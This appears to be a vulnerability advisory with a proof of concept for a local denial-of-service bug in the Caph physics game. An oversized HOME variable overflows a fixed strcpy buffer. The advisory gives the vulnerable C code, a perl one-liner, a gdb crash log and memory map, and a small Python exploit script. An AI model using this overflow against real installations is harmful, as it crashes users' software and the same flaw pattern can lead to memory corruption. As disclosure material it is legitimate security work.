# Caph DOS Exploit by N_A . Crashes the program and produces a segmentation fault # Tested upon Kali Linux. # Discovered by N_A , N_A [at] tutanota.com # Description # ============ # It is a sandbox game, based on physics. The game aim is to make contact red object with green object. # You can use various objects, solid, wire (rope), and bendable objects. Gravitation will help you. # https://sourceforge.net/projects/caphgame # Vulnerability # ============== # Caph suffers from a buffer over flow vulnerability that crashes the program. The 'HOME' environment # variable can be abused to produce an over flow.A The subsequent details are below: # in file caph.c # static const char * # sys_get_config() # { #A A A A A A A static char dir[256]; #A A A A A A A const char *home; # #if defined(_WIN32) #A A A A A A A strcpy(dir, DATA_CONFIG); #A A A A A A A return dir; # #else #A A A A A A A home = getenv("HOME"); # #A A A A A A A if (home) #A A A A A A A A A A A A A A A strcpy(dir, home); # The sys_get_config() function is called again in main() and an overflow can be produced , as per below: # NA@kali:~/caph-1.1/src$ export HOME=`perl -e 'print"A"x5000'` # NA@kali:/home/NAcaph-1.1/src$ ./caph # Segmentation fault # gdb caph # GNU gdb (Debian 7.11.1-2) 7.11.1 # Copyright (C) 2016 Free Software Foundation, Inc. # License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> # This is free software: you are free to change and redistribute it. # There is NO WARRANTY, to the extent permitted by law.A Type "show copying" # and "show warranty" for details. # This GDB was configured as "i686-linux-gnu". # Type "show configuration" for configuration details. # For bug reporting instructions, please see: # <http://www.gnu.org/software/gdb/bugs>. # Find the GDB manual and other documentation resources online at: # <http://www.gnu.org/software/gdb/documentation>. # For help, type "help". # Type "apropos word" to search for commands related to "word"... # Reading symbols from caph...done. # (gdb) r # Starting program: /home/NA/caph-1.1/src/caph # [Thread debugging using libthread_db enabled] # Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". # *** Error in `/home/NA/caph-1.1/src/caph': free(): invalid next size (normal): 0x08053028 *** # ======= Backtrace: ========= # /lib/i386-linux-gnu/libc.so.6(+0x66677)[0xb7cc8677] # /lib/i386-linux-gnu/libc.so.6(+0x6c627)[0xb7cce627] # /lib/i386-linux-gnu/libc.so.6(+0x6cdd1)[0xb7ccedd1] # /lib/i386-linux-gnu/libc.so.6(+0x5d7cd)[0xb7cbf7cd] # /lib/i386-linux-gnu/libc.so.6(fopen+0x1e)[0xb7cbf7fe] # /home/Nassar/newtest/caph-1.1/src/caph(main+0x196)[0x8049656] # /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb7c7a5f7] # /home/NA/caph-1.1/src/caph[0x804a6c4] # ======= Memory map: ======== # 08048000-08052000 r-xp 00000000 08:05 1709919A A A /home/NA/caph-1.1/src/caph # 08052000-08053000 rw-p 00009000 08:05 1709919A A A /home/NA/caph-1.1/src/caph # 08053000-08074000 rw-p 00000000 00:00 0A A A A A A A A A [heap] # b6f00000-b6f21000 rw-p 00000000 00:00 0 # b6f21000-b7000000 ---p 00000000 00:00 0 # b704b000-b704f000 rw-p 00000000 00:00 0 # b704f000-b707a000 r-xp 00000000 08:05 1708986A A A /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8 # b707a000-b707b000 r--p 0002a000 08:05 1708986A A A /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8 # b707b000-b707c000 rw-p 0002b000 08:05 1708986A A A /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8 # b707c000-b7083000 r-xp 00000000 08:05 1708466A A A /usr/lib/i386-linux-gnu/libogg.so.0.8.2 # b7083000-b7084000 r--p 00006000 08:05 1708466A A A /usr/lib/i386-linux-gnu/libogg.so.0.8.2 # b7084000-b7085000 rw-p 00007000 08:05 1708466A A A /usr/lib/i386-linux-gnu/libogg.so.0.8.2 # b7085000-b7086000 rw-p 00000000 00:00 0 # b7086000-b709a000 r-xp 00000000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709a000-b709b000 r--p 00013000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709b000-b709c000 rw-p 00014000 08:05 263412A A A A /lib/i386-linux-gnu/libgpg-error.so.0.17.0 # b709c000-b7113000 r-xp 00000000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7113000-b7114000 r--p 00076000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7114000-b7115000 rw-p 00077000 08:05 279321A A A A /lib/i386-linux-gnu/libpcre.so.3.13.3 # b7115000-b7129000 r-xp 00000000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b7129000-b712a000 r--p 00013000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b712a000-b712b000 rw-p 00014000 08:05 263327A A A A /lib/i386-linux-gnu/libresolv-2.23.so # b712b000-b712d000 rw-p 00000000 00:00 0 # b712d000-b71a7000 r-xp 00000000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71a7000-b71b8000 r--p 00079000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71b8000-b71b9000 rw-p 0008a000 08:05 1708599A A A /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11 # b71b9000-b7218000 r-xp 00000000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b7218000-b7219000 r--p 0005e000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b7219000-b721a000 rw-p 0005f000 08:05 1707230A A A /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0 # b721a000-b721b000 rw-p 00000000 00:00 0 # b721b000-b7231000 r-xp 00000000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7231000-b7232000 ---p 00016000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7232000-b7233000 r--p 00016000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7233000-b7234000 rw-p 00017000 08:05 263312A A A A /lib/i386-linux-gnu/libnsl-2.23.so # b7234000-b7236000 rw-p 00000000 00:00 0 # b7236000-b7252000 r-xp 00000000 08:05 263406A A A A /lib/i386-linux-gnu/libgcc_s.so.1 # b7252000-b7253000 rw-p 0001b000 08:05 263406A A A A /lib/i386-linux-gnu/libgcc_s.so.1 # b7253000-b731c000 r-xp 00000000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731c000-b731d000 ---p 000c9000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731d000-b731e000 r--p 000c9000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b731e000-b7321000 rw-p 000ca000 08:05 263313A A A A /lib/i386-linux-gnu/libgcrypt.so.20.1.2 # b7321000-b734b000 r-xp 00000000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734b000-b734c000 r--p 00029000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734c000-b734d000 rw-p 0002a000 08:05 279325A A A A /lib/i386-linux-gnu/liblzma.so.5.2.2 # b734d000-b7370000 r-xp 00000000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7370000-b7371000 r--p 00022000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7371000-b7372000 rw-p 00023000 08:05 263511A A A A /lib/i386-linux-gnu/libselinux.so.1 # b7372000-b7374000 rw-p 00000000 00:00 0 # b7374000-b7385000 r-xp 00000000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7385000-b7386000 r--p 00010000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7386000-b7387000 rw-p 00011000 08:05 1707416A A A /usr/lib/i386-linux-gnu/libXi.so.6.1.0 # b7387000-b738b000 r-xp 00000000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738b000-b738c000 r--p 00003000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738c000-b738d000 rw-p 00004000 08:05 263540A A A A /lib/i386-linux-gnu/libuuid.so.1.3.0 # b738d000-b7392000 r-xp 00000000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7392000-b7393000 r--p 00004000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7393000-b7394000 rw-p 00005000 08:05 1707484A A A /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1 # b7394000-b7406000 r-xp 00000000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7406000-b7407000 ---p 00072000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7407000-b7408000 r--p 00072000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7408000-b7409000 rw-p 00073000 08:05 1708754A A A /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25 # b7409000-b740d000 rw-p 00000000 00:00 0 # b740d000-b7415000 r-xp 00000000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7415000-b7416000 r--p 00007000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7416000-b7417000 rw-p 00008000 08:05 263542A A A A /lib/i386-linux-gnu/libwrap.so.0.7.6 # b7417000-b7418000 rw-p 00000000 00:00 0 # b7418000-b74a0000 r-xp 00000000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a0000-b74a1000 ---p 00088000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a1000-b74a3000 r--p 00088000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a3000-b74a4000 rw-p 0008a000 08:05 263522A A A A /lib/i386-linux-gnu/libsystemd.so.0.13.0 # b74a4000-b74aa000 r-xp 00000000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74aa000-b74ab000 r--p 00005000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74ab000-b74ac000 rw-p 00006000 08:05 1707439A A A /usr/lib/i386-linux-gnu/libXtst.so.6.1.0 # b74ac000-b74b4000 r-xp 00000000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b4000-b74b5000 r--p 00007000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b5000-b74b6000 rw-p 00008000 08:05 1707375A A A /usr/lib/i386-linux-gnu/libSM.so.6.0.1 # b74b6000-b74cf000 r-xp 00000000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74cf000-b74d0000 r--p 00018000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74d0000-b74d1000 rw-p 00019000 08:05 1707248A A A /usr/lib/i386-linux-gnu/libICE.so.6.3.0 # b74d1000-b74d3000 rw-p 00000000 00:00 0 # b74d3000-b74d8000 r-xp 00000000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74d8000-b74d9000 r--p 00004000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74d9000-b74da000 rw-p 00005000 08:05 1707406A A A /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0 # b74da000-b74db000 rw-p 00000000 00:00 0 # b74db000-b74dd000 r-xp 00000000 08:05 1707393A A A /usr/lib/i386-linux-gnu/libXau.so.6.0.0 # b74dd000-b74de000 r--p 00001000 08:05 1707393A A A /usr/lib/i386-linux-gnu/libXau.so.6.0.0 # b74de000-b74df000 rw-p 00002000 08:05 1707393A A A /usr/lib/i386-linux-gnu/libXau.so.6.0.0 # b74df000-b74ff000 r-xp 00000000 08:05 277202A A A A /lib/i386-linux-gnu/libtinfo.so.5.9 # b74ff000-b7501000 r--p 0001f000 08:05 277202A A A A /lib/i386-linux-gnu/libtinfo.so.5.9 # b7501000-b7502000 rw-p 00021000 08:05 277202A A A A /lib/i386-linux-gnu/libtinfo.so.5.9 # b7502000-b7535000 r-xp 00000000 08:05 263441A A A A /lib/i386-linux-gnu/libncursesw.so.5.9 # b7535000-b7536000 r--p 00032000 08:05 263441A A A A /lib/i386-linux-gnu/libncursesw.so.5.9 # b7536000-b7537000 rw-p 00033000 08:05 263441A A A A /lib/i386-linux-gnu/libncursesw.so.5.9 # b7537000-b7628000 r-xp 00000000 08:05 263430A A A A /lib/i386-linux-gnu/libslang.so.2.3.0 # b7628000-b762b000 r--p 000f0000 08:05 263430A A A A /lib/i386-linux-gnu/libslang.so.2.3.0 # b762b000-b763a000 rw-p 000f3000 08:05 263430A A A A /lib/i386-linux-gnu/libslang.so.2.3.0 # b763a000-b7669000 rw-p 00000000 00:00 0 # b7669000-b76c2000 r-xp 00000000 08:05 263384A A A A /lib/i386-linux-gnu/libdbus-1.so.3.14.6 # b76c2000-b76c3000 r--p 00058000 08:05 263384A A A A /lib/i386-linux-gnu/libdbus-1.so.3.14.6 # b76c3000-b76c4000 rw-p 00059000 08:05 263384A A A A /lib/i386-linux-gnu/libdbus-1.so.3.14.6 # ..... # ..... # ..... # Program received signal SIGABRT, Aborted. # 0xb7fdac38 in __kernel_vsyscall () # (gdb) import os def banner(): A A A print('==========================') A A A print('Local Caph DOS Exploit') A A A print() A A A print('\tby N_A') A A A print('==========================') A A A print() banner() buffer = "\x41" * 5000 os.environ['HOME'] = str(buffer) os.system('./caph') #make sure the exploit is in the same directory as caph -- Securely sent with Tutanota. Claim your encrypted mailbox today! https://tutanota.com